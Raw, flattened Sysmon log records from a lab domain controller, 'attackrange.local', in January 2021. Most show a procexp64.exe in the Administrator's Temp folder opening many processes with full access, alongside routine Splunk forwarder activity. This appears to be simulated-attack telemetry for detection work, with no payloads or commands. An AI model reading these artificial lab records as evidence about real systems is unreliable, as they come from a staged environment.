10341000x8000000000000000791002Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791001Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.470{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3263-6010-DAA2-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791000Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.454{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790999Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.454{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790998Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.454{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790997Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.454{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790996Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.454{732C744F-1517-600B-0500-00000000A301}640756C:\Windows\system32\csrss.exe{732C744F-3263-6010-DAA2-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000790995Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.454{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3263-6010-DAA2-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000790994Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.455{732C744F-3263-6010-DAA2-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000791258Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.970{732C744F-3264-6010-DCA2-00000000A301}59887644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791257Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.813{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3264-6010-DCA2-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791256Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.798{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791255Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.798{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791254Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.798{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791253Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.798{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791252Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.798{732C744F-1517-600B-0500-00000000A301}640756C:\Windows\system32\csrss.exe{732C744F-3264-6010-DCA2-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791251Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.798{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3264-6010-DCA2-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000791250Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.799{732C744F-3264-6010-DCA2-00000000A301}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000791249Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791248Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791247Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791246Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791245Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791244Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791243Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791242Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791241Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791240Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791239Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791238Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791237Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791236Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:52.626{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 